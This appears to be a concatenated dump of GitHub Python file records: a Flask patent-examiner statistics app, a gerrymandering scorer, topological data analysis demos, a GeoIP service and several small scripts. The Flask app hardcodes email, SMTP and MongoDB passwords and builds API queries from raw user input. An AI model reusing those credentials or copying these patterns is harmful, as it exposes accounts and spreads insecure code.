* response_success_rate)\r\n\r\n # Here ends the monthly data.\r\n\r\n reporting_text = \"

Hi there! The examiner's name is: \"\r\n reporting_text = reporting_text + examiner_name\r\n reporting_text = reporting_text + \"

We crunched through \"\r\n reporting_text = reporting_text + str(examiner_apps_we_have)\r\n reporting_text = reporting_text + \" applications for this examiner and here is what we can tell you:

\"\r\n reporting_text = reporting_text + \"Grant rate (chances to eventually reach a grant): \"\r\n reporting_text = reporting_text + str(examiner_grant_rate) + \"with interview: \" + str(examiner_grant_rate_with_interview) + \" / without interview: \" + str(examiner_grant_rate_without_interview) + \" improvement rate: \" + str(interview_improvement_rate)\r\n reporting_text = reporting_text + \"
Response success rate (chances to overcome one office action): \"\r\n reporting_text = reporting_text + str(response_success_rate)\r\n reporting_text = reporting_text + \"

Full monthly stats: \"\r\n months = {}\r\n for i in range (0,13):\r\n if (failed_month[i] !=0):\r\n month_stat[i] = successful_month[i] / (successful_month[i] + failed_month [i])\r\n month_stat[i] = \"%.0f%%\" % (100 * month_stat[i])\r\n if (i !=0):\r\n reporting_text = reporting_text + str(get_month_text(i)) + \": \" + month_stat[i] + \" | \"\r\n months[get_month_text(i)] = month_stat[i]\r\n\r\n #print (reporting_text)\r\n\r\n # Now is the time to check if the office action matches any of our pre-tracked queries\r\n # and if yes, to fire it up.\r\n\r\n # starting from checking if the applicant is in our tracked applicant's list.\r\n\r\n sender_email = \"freshipinsights@gmail.com\"\r\n receiver_email = \"zeev@freship.com\"\r\n password = \"freship14insights\"\r\n\r\n # Create the plain-text and HTML version of your message\r\n text = reporting_text\r\n html = \"\"+reporting_text+\"\"\r\n result = {}\r\n result['examiner_name'] = examiner_name\r\n result['examiner_apps_we_have'] = examiner_apps_we_have\r\n result['examiner_grant_rate'] = examiner_grant_rate\r\n result['examiner_grant_rate_with_interview'] = examiner_grant_rate_with_interview\r\n result['examiner_grant_rate_without_interview'] = examiner_grant_rate_without_interview\r\n result['response_success_rate'] = response_success_rate\r\n result['interview_improvement_rate'] = interview_improvement_rate\r\n result['months'] = months\r\n return (result)\r\n\r\n@app.route('/list_examiners')\r\n@cache.cached(timeout=3600)\r\ndef get_names():\r\n ## Initializing the mongo connection\r\n connection_string = 'mongodb+srv://Zeevtest:Zeevtest@freship-fu97s.mongodb.net/test?retryWrites=true&w=majority'\r\n from bson.decimal128 import Decimal128\r\n from bson.codec_options import TypeCodec\r\n class DecimalCodec(TypeCodec):\r\n python_type = Decimal # the Python type acted upon by this type codec\r\n bson_type = Decimal128 # the BSON type acted upon by this type codec\r\n def transform_python(self, value):\r\n \"\"\"Function that transforms a custom type value into a type\r\n that BSON can encode.\"\"\"\r\n return Decimal128(value)\r\n def transform_bson(self, value):\r\n \"\"\"Function that transforms a vanilla BSON type value into our\r\n custom type.\"\"\"\r\n return value.to_decimal()\r\n decimal_codec = DecimalCodec()\r\n\r\n today = date.today()\r\n cutoff_date = today - timedelta(days=70)\r\n\r\n from bson.codec_options import TypeRegistry\r\n type_registry = TypeRegistry([decimal_codec])\r\n from bson.codec_options import CodecOptions\r\n codec_options = CodecOptions(type_registry=type_registry)\r\n\r\n mongo_client = pymongo.MongoClient(connection_string)\r\n mydb = mongo_client[\"patents\"]\r\n db = mongo_client[\"patents\"]\r\n examiners_collection = mydb.get_collection(\"examiners_new\" , codec_options=codec_options)\r\n return jsonify([(i['examiner']) for i in examiners_collection.find()])\r\n\r\n@app.route('/search_app')\r\ndef search_app():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n data = '{\"searchText\":\"firstNamedApplicant:(' + name + ')\",\"fl\":\"applId patentTitle firstNamedApplicant appExamName \",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"firstNamedApplicant \",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"0\"}'\r\n print(data)\r\n return jsonify(list(set([i['firstNamedApplicant'][0] for i in requests.post('https://ped.uspto.gov/api/queries', headers=headers, data=data).json()['queryResults']['searchResponse']['response']['docs']])))\r\n\r\n\r\n@app.route('/get_apps')\r\ndef get_apps():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n page = int(request.args.get('page', 0))\r\n\r\n data = '{\"searchText\":\"firstNamedApplicant:(' + name + ')\",\"fl\":\"*\",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"firstNamedApplicant \",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"' + str(page * 20) + '\"}'\r\n print(data)\r\n return jsonify(requests.post('https://ped.uspto.gov/api/queries', headers=headers, data=data).json())\r\n\r\n@app.route('/get_apps_by_id')\r\ndef get_apps_by_id():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n page = int(request.args.get('page', 0))\r\n\r\n data = '{\"searchText\":\"applId:(' + name + ')\",\"fl\":\"applId patentTitle firstNamedApplicant appExamName\",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"applId\",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"' + str(page * 20) + '\"}'\r\n print(data)\r\n return jsonify(requests.post('https://ped.uspto.gov/api/queries', headers=headers, data=data).json())\r\n\r\n@app.route('/email')\r\ndef send_email():\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.image import MIMEImage\r\n import smtplib\r\n\r\n # create message object instance\r\n msg = MIMEMultipart()\r\n\r\n examiner_name = request.args['name']\r\n email = request.args['email']\r\n resp = hello_world(examiner_name)\r\n message = \"

Hi there! The examiner's name is: \" + \"\\n\"\r\n message = message + examiner_name + \"\\n\"\r\n message = message + \"

We crunched through \"\r\n message = message + str(resp['examiner_apps_we_have']) + \"\\n\"\r\n message = message + \" applications for this examiner and here is what we can tell you:

\" + \"\\n\"\r\n message = message + \"Grant rate (chances to eventually reach a grant): \" + \"\\n\"\r\n message = message + str(resp['examiner_grant_rate']) + \"with interview: \" + str(resp['examiner_grant_rate_with_interview']) + \" / without interview: \" + str(resp['examiner_grant_rate_without_interview']) + \" improvement rate: \" + str(resp['interview_improvement_rate'])\r\n message = message + \"
Response success rate (chances to overcome one office action): \"\r\n message = message + str(resp['response_success_rate']) + \"\\n\"\r\n objects = resp['months'].keys()\r\n y_pos = np.arange(len(objects))\r\n monto = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\r\n print(y_pos)\r\n performance = [int(resp['months'][month].replace('%', '')) for month in monto]\r\n print(performance)\r\n\r\n plt.bar(y_pos, performance)\r\n plt.xlabel('Month Number')\r\n plt.ylabel('Success percentage rate by month')\r\n plt.legend(loc='upper left')\r\n plt.grid(True, linewidth= 1, linestyle=\"--\")\r\n plt.savefig('temp.png')\r\n fp = open('temp.png', 'rb')\r\n img = MIMEImage(fp.read())\r\n # setup the parameters of the message\r\n password = \"df8hypJVCXscFmNH\"\r\n msg['From'] = \"zeev@freship.com\"\r\n msg['To'] = email\r\n msg['Subject'] = \"Export result for examiner \" + examiner_name\r\n\r\n # add in the message body\r\n msg.attach(MIMEText(message, 'plain'))\r\n img.add_header('Content-ID', '<{}>'.format('temp.png'))\r\n msg.attach(img)\r\n #create server\r\n server = smtplib.SMTP('smtp-relay.sendinblue.com: 587')\r\n\r\n server.starttls()\r\n\r\n # Login Credentials for sending the mail\r\n server.login(msg['From'], password)\r\n\r\n\r\n # send the message via the server.\r\n server.sendmail(msg['From'], msg['To'], msg.as_string())\r\n\r\n server.quit()\r\n\r\n print(\"successfully sent email to %s:\" % (msg['To']))\r\n return \"success\"\r\n\r\n","repo_name":"AlphaPL/CheckExaminer","sub_path":"check_examiner.py","file_name":"check_examiner.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3760754879","text":"import pandas as pd\nfrom pandasql import sqldf\nsql = lambda q: sqldf(q, globals())\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# Importing data\nd = r'/Users/npbuckli/GitHub/gerryscore/gerryscore/Excel work.xlsx'\ndata_raw = pd.read_excel(d,sheet='data')\n\n# Filtering out stuff we don't need\ndata = data_raw[(data_raw['year'] == 2016) & (data_raw['special'] == False) & (data_raw['writein'] == False)]\n\n# Seeing the frequency of political parties\npd.crosstab(data['state'],data['party'],margins=True)\ndata['party'].value_counts()\n\n# We only really need R or D so keepign that\ndata = data[(data['party'] == 'democrat') | (data['party'] == 'republican')]\n\n# Cleaning up the dataset because it's got a bunch of variables we don't need\ndata = data[['state','district','party','candidatevotes']]\n\n# Transposing D/R \ndata = pd.pivot_table(data,values='candidatevotes',index=['state','district'],columns='party').reset_index()\n\n# Sorting\ndata = data.sort_values(by=['state','district'])\n\n# Summing votes\ndata = data.fillna(0)\ndata['totalvotes'] = data['democrat'] + data['republican']\n\n# Calculating vote share pct\ndef share(var):\n temp = data.copy()\n temp['{}share'.format(var)] = temp['{}'.format(var)] / temp['totalvotes']\n return temp\ndata = share('democrat')\ndata = share('republican')\n\n\n# Calculating statistics needed for \ndef calc(v1,v2):\n temp = data.copy()\n temp = data.groupby('state').agg({\"{}\".format(v1):{\"{}_mean\".format(v2):np.mean,\"{}_median\".format(v2):np.median,\"{}_std\".format(v2):np.std,\"{}_count\".format(v2):np.size}})\n temp.columns = temp.columns.droplevel(0)\n temp['{}_meanmediandiff'.format(v2)] = temp['{}_mean'.format(v2)] - temp['{}_median'.format(v2)]\n temp['{}_ste'.format(v2)] = temp['{}_std'.format(v2)] / (np.sqrt(temp[\"{}_count\".format(v2)]))\n temp['{}_zscore'.format(v2)] = temp['{}_meanmediandiff'.format(v2)] / temp['{}_ste'.format(v2)] + .5808 #<- Corretion factor\n return temp\n\ndata1 = calc('democratshare','d')\ndata2 = calc('republicanshare','r')\n\n# Merging on republican z-scores\ndata_summary = pd.merge(data1,data2[['r_zscore']],left_index=True,right_index=True)\ndata_summary = data_summary.dropna(subset=['d_zscore','r_zscore'])\n\n\n# If the democrats were disadvantaged by mean, median difference, we want to take the republican z-score.\n# And vice-versa for the republicans. \n\ndata_summary['final_z'] = data_summary['d_zscore']\nmask = data_summary['d_meanmediandiff'] >0\ndata_summary['final_z'][mask] = data_summary['r_zscore']\n\n# Identifying which party is advantaged\ndata_summary['swing'] = 'Dem'\nmask = data_summary['d_meanmediandiff'] >0 \ndata_summary['swing'][mask] = 'GOP'\n\nmask = data_summary['d_meanmediandiff'] == 0 \ndata_summary['swing'][mask] = 'Neither'\n\ndata_summary = data_summary.reset_index()\n\n# Scaling z-scores so they are easier to understand\n\nscaler = MinMaxScaler()\ndata_summary['Score'] = 1 - (scaler.fit_transform(data_summary[['final_z']]))\n\n# Plotting\ndata_summary = data_summary.sort_values('Score',ascending=False)\nax = sns.barplot(x='Score',y='state',hue='swing',data=data_summary,dodge=False,orient=\"h\")\nax.figure.set_figheight(10)\n\n\n\n","repo_name":"nbucklin/gerryscore","sub_path":"gerryscore.py","file_name":"gerryscore.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16251366375","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 10 09:30:27 2016\n\n\nInstalled Ripser thtrough navigator, using\nhttps://anaconda.org/conda-forge/ripser\nhttps://stackoverflow.com/questions/39299726/cant-find-package-on-anaconda-navigator-what-to-do-next\n\n\ndocumentation for Ripser can be found here\nhttps://ripser.scikit-tda.org/en/latest/reference/stubs/ripser.ripser.html#ripser.ripser\n\n\n@author: downey\n\"\"\"\n\n#%% import modules and set default fonts and colors\n\nimport IPython as IP\nIP.get_ipython().magic('reset -sf')\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as PD\nimport scipy as sp\nfrom scipy import interpolate\nimport pickle\nimport time\nimport re\nimport json as json\nimport pylab\nimport math as math\nfrom pointInside import *\nimport itertools as itertools\nimport ripser as ripser\nimport persim as persim\nimport sklearn as sklearn\nfrom sklearn import datasets\n\n\n# set default fonts and plot colors\nplt.rcParams.update({'image.cmap': 'viridis'})\ncc = plt.rcParams['axes.prop_cycle'].by_key()['color']\nplt.rcParams.update({'font.serif':['Times New Roman', 'Times', 'DejaVu Serif',\n 'Bitstream Vera Serif', 'Computer Modern Roman', 'New Century Schoolbook',\n 'Century Schoolbook L', 'Utopia', 'ITC Bookman', 'Bookman', \n 'Nimbus Roman No9 L', 'Palatino', 'Charter', 'serif']})\nplt.rcParams.update({'font.family':'serif'})\nplt.rcParams.update({'font.size': 10})\nplt.rcParams.update({'mathtext.fontset': 'custom'})\nplt.rcParams.update({'mathtext.rm': 'serif'})\nplt.rcParams.update({'mathtext.it': 'serif:italic'})\nplt.rcParams.update({'mathtext.bf': 'serif:bold'})\nplt.close('all')\n\n#%% Plotting examples I have found and like\n\n\n\n#%% Esample 1\n\ndata = datasets.make_circles(n_samples=110)[0]\n\nt = np.linspace(0, 5, 100)\nx = np.cos(2*np.pi*t) + t\ndel(data)\ndata = np.vstack((t,x)).T\n\n\nplt.figure()\nplt.scatter(data[:,0],data[:,1])\n\nplt.figure()\nD = ripser.ripser(data)\n\ndgms = D['dgms']\npersim.plot_diagrams(dgms, show = True)\n\n#%% The PersistenceImager() Class from https://persim.scikit-tda.org/en/latest/notebooks/Persistence%20images.html\n\n# Printing a PersistenceImager() object will print its defining attributes\npimgr = persim.PersistenceImager(pixel_size=0.2, birth_range=(0,1))\n\n\n# PersistenceImager() attributes can be adjusted at or after instantiation.\n# Updating attributes of a PersistenceImager() object will automatically update all other dependent attributes.\npimgr.pixel_size = 0.1\npimgr.birth_range = (0, 2)\n\n\n\n# The `fit()` method can be called on one or more (*,2) numpy arrays to automatically determine the miniumum birth and\n# persistence ranges needed to capture all persistence pairs. The ranges and resolution are automatically adjusted to\n# accomodate the specified pixel size.\npimgr = persim.PersistenceImager(pixel_size=0.5)\npdgms = [np.array([[0.5, 0.8], [0.7, 2.2], [2.5, 4.0]]),\n np.array([[0.1, 0.2], [3.1, 3.3], [1.6, 2.9]]),\n np.array([[0.2, 1.5], [0.4, 0.6], [0.2, 2.6]])]\npimgr.fit(pdgms, skew=True)\n\n\n# The `transform()` method can then be called on one or more (*,2) numpy arrays to generate persistence images from diagrams.\n# The option `skew=True` specifies that the diagrams are currently in birth-death coordinates and must first be transformed\n# to birth-persistence coordinates.\npimgs = pimgr.transform(pdgms, skew=True)\npimgs[0]\n\n# The `plot_diagram()` and `plot_image()` methods can be used to visualize persistence diagrams and images\nfig, axs = plt.subplots(1, 3, figsize=(10,5))\n\naxs[0].set_title(\"Original Diagram\")\npimgr.plot_diagram(pdgms[0], skew=False, ax=axs[0])\n\naxs[1].set_title(\"Birth-Persistence\\nCoordinates\")\npimgr.plot_diagram(pdgms[0], skew=True, ax=axs[1])\n\naxs[2].set_title(\"Persistence Image\")\npimgr.plot_image(pimgs[0], ax=axs[2])\n\nplt.tight_layout()\n\n\n#%% Generate a persistence diagram using Ripser from https://persim.scikit-tda.org/en/latest/notebooks/Persistence%20images.html\n\n# lots of random noise and 2 circles\ndata = np.concatenate([150 * np.random.random((300,2)),\n 10 + 10 * datasets.make_circles(n_samples=100)[0],\n 100 + 20 * datasets.make_circles(n_samples=100)[0]])\n\ndata = 150 * np.random.random((300,2))\n\nrips = ripser.Rips()\ndgms = rips.fit_transform(data)\nH0_dgm = dgms[0]\nH1_dgm = dgms[1]\n\nplt.figure(figsize=(10,5))\nplt.subplot(121)\nplt.scatter(data[:,0], data[:,1], s=4)\nplt.title(\"Scatter plot of noisy data with some circles\")\n\nplt.subplot(122)\nrips.plot(dgms, legend=False, show=False)\nplt.title(\"Persistence diagram of $H_0$ and $H_1$\")\nplt.show()\n\n# The resolution of the persistence image is adjusted by choosing the pixel size, given in the same units as the diagram\npimgr = persim.PersistenceImager(pixel_size=1)\npimgr.fit(H1_dgm)\n\nfig, axs = plt.subplots(1, 3, figsize=(20,5))\npimgr.plot_diagram(H1_dgm, skew=True, ax=axs[0])\naxs[0].set_title('Diagram', fontsize=16)\n\npimgr.plot_image(pimgr.transform(H1_dgm), ax=axs[1])\naxs[1].set_title('Pixel Size: 1', fontsize=16)\n\npimgr.pixel_size = 0.1\npimgr.plot_image(pimgr.transform(H1_dgm), ax=axs[2])\naxs[2].set_title('Pixel Size: 0.1', fontsize=16)\n\nplt.tight_layout()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ARTS-Laboratory/Real-time-Topological-Data-Analysis","sub_path":"Initial_TDA_exploration/v5.2_processing_code.py","file_name":"v5.2_processing_code.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"8588027124","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 11:25:16 2019\n\n@author: ANISHKA\n\"\"\"\n\n# Code Challenge : Pangram\ndef pangram_check():\n string=input(\"Enter the string : \")\n alphabet=\"abcdefghijklmnopqrstuvwxyz\"\n for char in alphabet:\n if (char not in string.lower()):\n return \" Not Pangram\"\n \n return \"pangram\"\n \n \nprint(pangram_check())\n \n\n\n\n\n ","repo_name":"AnushkaTiwari/FSDP_2019","sub_path":"Day02/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73823741167","text":"import redis\nimport requests\nimport json\n\n\nclass GeoIPApiService:\n def __init__(self, **kwargs):\n self.r = redis.Redis(host='localhost', port=6379, db=0)\n self.geoip_api_username = kwargs['geoIPUsername']\n self.geoip_api_key = kwargs['geoIPApiKey']\n\n def find_data(self, ip: str, use_cache: bool) -> json:\n \"\"\"Finds the data if use_cache is true then checks the redis database before the api\"\"\"\n if use_cache:\n redis_return = self.r.get(ip)\n if redis_return:\n return redis_return.decode('utf-8')\n else:\n return self.jsonify_api(ip)\n else:\n return self.jsonify_api(ip)\n\n # remember to check if the http header is correct if not throw\n def jsonify_api(self, ip: str) -> json:\n request = requests.get(f\"https://geolite.info/geoip/v2.1/city/{ip}\",\n auth=(self.geoip_api_username, self.geoip_api_key))\n if request.status_code == requests.codes.ok:\n return request.text\n else:\n request.raise_for_status()\n","repo_name":"eatthoselemons/ip-search-python-challenge","sub_path":"GeoIPApiService.py","file_name":"GeoIPApiService.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11704881795","text":"\"\"\"\n aim: send data by http-body and query-string\n If using query string to send json data, one problem is the maximum length of the url. Sending json in the http-body\ndoes not have this problem. Also, it is not convenient to construct a dictionary or a list in query string.\n\"\"\"\n\nimport requests\n\n__url = 'http://127.0.0.1:8000/service/jenkins_build/update'\n__body = {\n 'param1': [1, 2, 3],\n 'param2': {'1': 1, '2': 2},\n}\n__qry = {'job_name': 'jenkins_job', 'build_status': '-1', 'msg4print': \"success build\"}\n# params: query-string\nresp = requests.get(__url, params=__qry, json=__body)\nprint(resp.text)\n\n","repo_name":"hobin2017/Webapp","sub_path":"test_requests/tutorial10.py","file_name":"tutorial10.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72390199087","text":"#The concatanate inputs function is used to merge the relevant text elements into a single text element in order to convert it to tokens. \ndef concatenate_inputs(question, conversation_history, context, response):\n ##To determine the relevant tokens excluding the prompt template we take the following elements:\n # question - Question submitted by the user in the chat interface\n # conversation_history - The conversational history passed to the model as context\n # context - The reference answer passed to the model to help generate an adequate response to the question\n \n # The combined_text variable is initialized simply as the question\n combined_text = question\n\n # We now start adding the conversational history to the initialized \"combined_text\"\n # The conversation history variable is a list of lists. Each outer list item corresponds to one conversational turn\n for exchange in conversation_history:\n # We iterate through the conversation_history, working through each element as the variable \"exchange\"\n # Each conversational turn (list item named exchange in this case) consists of two strings (text elements), \n # the first one, exchange[0] corresponds to the users submitted question, the second element exchange[1] \n # corresponds to the bots response.\n # For each conversational turn we extend the combined text by a space, the user question, a space, the bot response\n combined_text = combined_text + \" \" + exchange[0] + \" \" + exchange[1]\n\n # We now take the combined text, which at this point consists of the original user question and the elements of the conversational \n # history, and add another space as well as the context used to answer the question which is taken from the QA database provided\n combined_text += \" \" + context\n\n return combined_text\n\n# The count total tokens function takes the individual text elements as an input, merges them into a single text element using the \n# concatenate_inputs function. This merged text is then tokenized using the tiktoken package provided by OpenAI (https://github.com/openai/tiktoken)\n# after which we count the number of tokens that the text was converted to using the built in len() function provided by python.\ndef count_total_tokens(question, conversation_history, context, response):\n import tiktoken\n\n # Here we load the encoding model (tokenizer) that is used to convert text into tokens prior to being processed by the Large Language Model. \n encoder = tiktoken.encoding_for_model(\"gpt-3.5-turbo\")\n \n # Here we pass the individual elements to the function we have defined that allows us to merge all textual elements\n # into a single text element named prompt\n prompt = concatenate_inputs(question, conversation_history, context, response)\n\n # We new generate the encoding from our original text using the previously defined encoder by passing our \n # prompt text to it\n encoding = encoder.encode(prompt)\n \n # We now determine the length (number of elements) that make up our encoding using pythons integrated len() function\n total_tokens = len(encoding)\n \n # Here we return the number of tokens that we calculated for storage in the database. \n return total_tokens\n","repo_name":"kkotsche1/counting-tokens-SoftCann","sub_path":"token_counter.py","file_name":"token_counter.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1603649167","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n 绑定按钮事件及中间逻辑。\n\"\"\"\n\nfrom PyQt5 import QtGui,QtCore, QtWidgets\nfrom Ui_MplMainWindow import Ui_MainWindow\nfrom mplCanvasWrapper import MplCanvasWrapper\nfrom historyShowWrapper import HistoryShowWrapper\nimport sys\n\nclass Code_MainWindow(Ui_MainWindow):#修改为从Ui_MainWindow继承\n def __init__(self, parent = None): \n super(Code_MainWindow, self).__init__(parent)\n self.setupUi(self)\n self.startBtn.clicked.connect(self.startPlot)\n self.stopBtn.clicked.connect(self.stopPlot)\n \n def startPlot(self):\n self.func = self.funcComboBox.currentIndex()\n if self.func is 0:\n self.mplCanvas = MplCanvasWrapper(self.centralwidget)\n elif self.func is 1:\n self.mplCanvas = HistoryShowWrapper(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.mplCanvas.sizePolicy().hasHeightForWidth())\n self.mplCanvas.setSizePolicy(sizePolicy)\n self.mplCanvas.setObjectName(\"mplCanvas\")\n self.gridLayout.addWidget(self.mplCanvas, 1, 0, 1, 1)\n \n code = self.codeLineEdit.text()\n self.mplCanvas.startPlot(code)\n pass\n \n def stopPlot(self):\n ''' pause plot '''\n self.mplCanvas.pausePlot()\n pass\n \n def releasePlot(self):\n ''' stop and release thread'''\n self.mplCanvas.releasePlot()\n \n def closeEvent(self,event):\n result =QtWidgets.QMessageBox.question(self,\n \"Confirm Exit...\",\n \"Are you sure you want to exit ?\",\n QtWidgets.QMessageBox.Yes|QtWidgets.QMessageBox.No)\n event.ignore()\n if result ==QtWidgets.QMessageBox.Yes:\n self.releasePlot()#release thread's resouce\n event.accept()\n \nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv) \n ui = Code_MainWindow() \n ui.show() \n sys.exit(app.exec_())","repo_name":"ccyuki/tradeShow","sub_path":"Code_MplMainWindow.py","file_name":"Code_MplMainWindow.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74718069165","text":"class Solution:\n def matrixBlockSum(self, mat: List[List[int]], k: int) -> List[List[int]]:\n res = []\n #Build pref sum matrix\n for i in range(len(mat)):\n for j in range(len(mat[i])):\n prev_row_val = 0 if i-1 < 0 else mat[i-1][j]\n prev_col_val = 0 if j-1 < 0 else mat[i][j-1]\n prev_diag_val = mat[i-1][j-1] if (i-1 >= 0 and j-1 >= 0) else 0\n\n mat[i][j] += ((prev_row_val+prev_col_val)-prev_diag_val)\n\n #Calculate result\n for i in range(len(mat)):\n res.append([])\n for j in range(len(mat[i])):\n top_row = max(0,i-k-1)\n bottom_row = min(len(mat)-1,i+k)\n left_col = max(0,j-k-1)\n right_col = min(len(mat[i])-1,j+k)\n\n total = mat[bottom_row][right_col]\n left_total = mat[bottom_row][left_col] if j-k-1 >= 0 else 0\n top_total = mat[top_row][right_col] if i-k-1 >= 0 else 0\n diag_total = mat[top_row][left_col] if ((i-k-1) >= 0 and (j-k-1) >=0) else 0\n\n res[-1].append((total-left_total-top_total)+diag_total) \n\n return res","repo_name":"rebecca759/Competitive_Programming","sub_path":"DailyQuestions/matrix_block_sum.py","file_name":"matrix_block_sum.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"22677305720","text":"from __future__ import division\n\nimport re\n\nimport numpy as np\nimport uncertainties\nfrom past.utils import old_div\n\nfrom threeML.io.logging import setup_logger\n\nlog = setup_logger(__name__)\n\n\ndef interval_to_errors(value, low_bound, hi_bound):\n \"\"\"\n Convert error intervals to errors\n\n :param value: central value \n :param low_bound: interval low bound\n :param hi_bound: interval high bound\n :return: (error minus, error plus)\n \"\"\"\n\n error_plus = hi_bound - value\n error_minus = value - low_bound\n\n return error_minus, error_plus\n\n\ndef get_uncertainty_tokens(x):\n \"\"\"\n Split the given uncertainty in number, error and exponent.\n\n :param x: an uncertainty instance\n :return: number, error and exponent\n \"\"\"\n\n this_str = x.__str__()\n\n is_inf = False\n \n if \"inf\" in this_str:\n is_inf = True\n\n\n this_str = this_str.replace(\"inf\", \"nan\")\n \n \n try:\n\n number, uncertainty, exponent = re.match(\n \"\\(?(\\-?[0-9]+\\.?[0-9]*) ([0-9]+\\.?[0-9]*)\\)?(e[\\+|\\-][0-9]+)?\",\n this_str.replace(\"+/-\", \" \").replace(\"nan\", \"0\"),\n ).groups()\n\n except:\n\n log.error(\n f\"Could not extract number, uncertainty and exponent from {x.__str__()}. This is likely a bug.\")\n\n raise RuntimeError()\n\n if is_inf:\n\n uncertainty = \"inf\"\n\n \n return number, uncertainty, exponent\n\n\ndef _order_of_magnitude(value):\n\n return 10 ** np.floor(np.log10(abs(value)))\n\n\ndef uncertainty_formatter(value, low_bound, hi_bound):\n \"\"\"\n Gets a value and its error in input, and returns the value, the uncertainty and the common exponent with the proper\n number of significant digits in a string like (4.2 -0.023 +5.23) x 10^5\n\n :param value:\n :param error: a *positive* value\n :return: string representation of interval\n \"\"\"\n\n # Get the errors (instead of the boundaries)\n\n error_m, error_p = interval_to_errors(value, low_bound, hi_bound)\n\n error_p_is_nan = False\n error_m_is_nan = False\n\n if not np.isfinite(error_p):\n\n log.warning(f\"the positive uncertainty is not finite \")\n\n error_p_is_nan = True\n\n if not np.isfinite(error_m):\n\n log.warning(f\"the negative uncertainty is not finite \")\n\n error_m_is_nan = True\n\n # Compute the sign of the errors\n # NOTE: sometimes value is not within low_bound - hi_bound, so these sign might not always\n # be -1 and +1 respectively\n\n sign_m = _sign(low_bound - value)\n sign_p = _sign(hi_bound - value)\n\n # Scale the values to the order of magnitude of the value\n\n tmp = [_order_of_magnitude(value)]\n\n if not error_m_is_nan:\n\n tmp.append(_order_of_magnitude(error_m))\n\n if not error_p_is_nan:\n\n tmp.append(_order_of_magnitude(error_p))\n\n order_of_magnitude = max(tmp)\n\n scaled_value = old_div(value, order_of_magnitude)\n scaled_error_m = old_div(error_m, order_of_magnitude)\n scaled_error_p = old_div(error_p, order_of_magnitude)\n\n # Get the uncertainties instance of the scaled values/errors\n\n x = uncertainties.ufloat(scaled_value, abs(scaled_error_m))\n\n # Split the uncertainty in number, negative error, and exponent (if any)\n\n num1, unc1, exponent1 = get_uncertainty_tokens(x)\n\n # Repeat the same for the other error\n\n y = uncertainties.ufloat(scaled_value, abs(scaled_error_p))\n\n num2, unc2, exponent2 = get_uncertainty_tokens(y)\n\n # Choose the representation of the number with more digits\n # This is necessary for asymmetric intervals where one of the two errors is much larger in magnitude\n # then the others. For example, 1 -0.01 +90. This will choose 1.00 instead of 1,so that the final\n # representation will be 1.00 -0.01 +90\n\n if len(num1) > len(num2):\n\n num = num1\n\n else:\n\n num = num2\n\n # Get the exponent of 10 to use for the representation\n\n expon = int(np.log10(order_of_magnitude))\n\n if unc1 != unc2:\n\n # Asymmetric error\n\n repr1 = \"%s%s\" % (sign_m, unc1)\n repr2 = \"%s%s\" % (sign_p, unc2)\n\n if expon == 0:\n\n # No need to show any power of 10\n\n return \"%s %s %s\" % (num, repr1, repr2)\n\n elif expon == 1:\n\n # Display 10 instead of 10^1\n\n return \"(%s %s %s) x 10\" % (num, repr1, repr2)\n\n else:\n\n # Display 10^expon\n\n return \"(%s %s %s) x 10^%s\" % (num, repr1, repr2, expon)\n\n else:\n\n # Symmetric error\n repr1 = \"+/- %s\" % unc1\n\n if expon == 0:\n\n return \"%s %s\" % (num, repr1)\n\n elif expon == 1:\n\n return \"(%s %s) x 10\" % (num, 